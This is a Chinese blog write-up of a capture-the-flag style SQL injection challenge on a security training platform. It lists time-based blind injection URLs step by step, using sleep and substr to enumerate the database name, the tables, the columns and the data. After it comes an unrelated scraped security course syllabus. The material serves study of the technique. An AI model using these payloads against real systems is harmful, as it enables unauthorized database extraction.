网络信息安全学习平台---注入关第7题

网络信息安全学习平台网址:http://hackinglab.cn/
sql盲注:题目内容见平台上的第7题
我主要使用的基于时间的盲注,其它类型的盲注可自行测试
1、首先要确定数据库名的长度
输入
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and if(length((SELECT concat(database())))<10,sleep(2),1)%23
查看等待时间,当为14时,等待,说明数据库名的长度为13
2、猜测数据库名
猜测第一个字符
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and if(substr((SELECT concat(database())), 1,1)='0',sleep(2),1)%23
当输入测试第一个字符为r时,等待
猜测第二个字符
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and if(substr((SELECT concat(database())), 2,1)='0',sleep(2),1)%23
当输入为0时,等待
......
依据猜测,数据库名为r0866cplushua

3、猜测数据库中有多少个表
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and if((select count(TABLE_NAME) from information_schema.tables where table_schema=0x723038363663706C7573687561)=3,sleep(2),1)%23
经过多次测试,确认有3个表
4、猜测第一个表名的长度
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and if(length((select TABLE_NAME from information_schema.tables where table_schema=0x723038363663706C7573687561 limit 0,1))=3,sleep(2),1)%23
为3
------------------------------------------------好了,明天继续猜测吧2016-4-25 23:16--------------------------------------------------
5、猜测表名
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x723038363663706C7573687561 limit 1,1),5,1)='o',sleep(2),1)%23
.....
最后知道有log,user,motto表名
6、猜测表有多少列
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if((select count(COLUMN_NAME) from information_schema.columns where table_name=0x6D6F74746F )=3,sleep(2),1)%23
经过多次测试,表motto中有3列
7、猜测列名长度
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(length((select COLUMN_NAME from information_schema.columns where table_name=0x6D6F74746F limit 0,1 ))=2,sleep(2),1)%23
第一个,2个字符,第二个8个字符,第三个是5个字符
8、猜测列名
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select COLUMN_NAME from information_schema.columns where table_name=0x6D6F74746F limit 1,1 ),1,1)='u',sleep(2),1)%23
第一个为id,第二列为username,第三列为motto
9、猜测有多少行
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if((select count(*) from motto)=4,sleep(2),1)%23
结果为4行
10、猜测内容
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ASCII(substr((select motto from motto limit 0,1),1,1))=109,sleep(2),1)%23

方法知道了,用sqlmap跑吧,手工测试太累了:)
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
网络安全技术》课程标准 开设时间:第4学期 课时数:90 一、课程性质 《网络安全技术》是计算机网络技术专业的实践性较强的核心课程,主要面向网络安全 管理员和网络管理员岗位。从机关、企事业网络的发展出发,进行项目化设计并安排内 容,重视规范化流程,重视学生团队分析和解决问的能力。培养解决实际网络安全问 的能力,具有良好的职业道德和团队协作精神的技能型人才。 本课程是依据我校计算机网络技术专业人才培养方案中,针对计算机网络安全管理 与维护的职业能力要求而设置的。其总体设计思路是,打破以知识传授为主要特征的传 统学科课程模式,转变为以项目、任务形式组织教学内容,学生在完成项目与任务过程 中学习网络安全管理与维护的技能。在课程实施中,按"项目导向,任务驱动"的教学模 式,采用项目式教学法、任务驱动教学法、自主学习法、角色扮演法等形式多样的教学 方法。教学效果评价采取过程性评价与结果性评价相结合,学生评价与教师评价相结合 ,重点考核网络安全管理与维护能力,过程性评价占70%,综合性评价的比重各为30%。 以网络安全管理工作岗位和网络系统管理岗位的安全规划和安全防护技术实施的职业 能力培养为目标建构课程。最终确定以下5个学习项目:保护家庭网络安全、保护中小企 业网应用服务器安全、保护大型企业内网安全、保护校园网接入INTERNET网络安全、保 护电子政务网数据传输安全。将网络安全所需的安全理论和安全技术根据情境需要融入 到学习项目中,经过这些项目的学习,不但可以让学生掌握基本的网络安全知识和技能 ,而且还能全面培养学生的团队合作、沟通表达、职业规范与职业道德等综合素质。 二、培养目标 1.专业能力 1) 能进行网络安全需求分析; 2) 能正确选用、使用主流品牌和型号的网络安全产品; 3) 能进行路由器与交换机的安全配置与管理; 4) 能进行网络安全监控与分析,处理安全漏洞,防范网络攻击; 5) 能进行服务器、网站及数据库安全配置与管理; 6) 能进行防火墙和入侵检测系统的配置; 7) 能备份与恢复数据; 8) 能依据网络安全相关法规,应急处理基本的信息安全事件。 2.方法能力 (1)自主学习获取信息的能力; (2)决策与规划的能力; (3)自我控制与管理的能力; (4)评价执行结果的能力。 3.社会能力 (1)很强的团队精神; (2)善于发现问、解决问; (3)踏实肯干、耐心细致; (4)有责任心;; (5)思路清晰; (6)独立性强; (7)诚信可靠,具备良好的服务意识。 三、与前后课程的联系 1、与前续课程的联系 本课程的前导课程主要有:《Windows Server 2003》、《计算机网络技术基础》和《网络设备互联技术》等,学生在掌握计算机网络技术知 识和网络设备配置后,能为本课程学习奠定良好的基础。 2、与后续课程的关系 是《网络工程与综合布线》等课程的基础。 四、教学内容与学时分配 "序号"项目 "工作任务 "知识目标及技能目标 "学时安排" "1 "保护家庭网络"分析主机系统 "认知扫描器工具 "4 " " "安全(14课时"安全 "能应用扫描器工具发现主机 " " " ") " "系统安全风险 " " " " "堵塞系统漏洞 "能安装、配置杀毒软件与安 "4 " " " ",清除主机病 "全卫士,查杀病毒与木马, " " " " "毒与木马 "修复系统及应用程序漏洞 " " " " "加固主机系统 "能保护系统账号,防止暴力 "4 " " " "安全 "破解;能配置本地安全策略 " " " " " ",加强系统安全 " " " " "评价总结 "2 " "2 "保护中小企业"WEB应用服务器"能分析系统日志 "14 " " "网应用服务器"安全防护 "能做好服务器系统安全设置 " " " "安全(20课时" "能做好IIS安全设置; " " " ") " "能防御SQL注入攻击; " " " " "数据库服务器 "能识别数据库服务器的安全 "2 " " " "安全防护 "威胁; " " " " " "能做好SQL SERVER数据库安 " " " " " "全防护; " " " " "评价总结 "4 " "3 "保护大型企业"网络设备安全 "能配置网络设备安全,防止 "10 " " "内网安全(14"防护 "非法登陆设备 " " " "课时) " "能配置交换机安全配置以防 " " " " " "止ARP欺骗 " " " " " "能在网络设备上配置ACL以实" " " " " "现访问安全控制 " " " " "内部用户网络 "认知802.1X协议 "4 " " " "接入控制 "能配置交换机设备实现内网 " " " " " "用户接入控制 " " " " "保证网络物理 "认知网络物理安全 "2 " " "

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值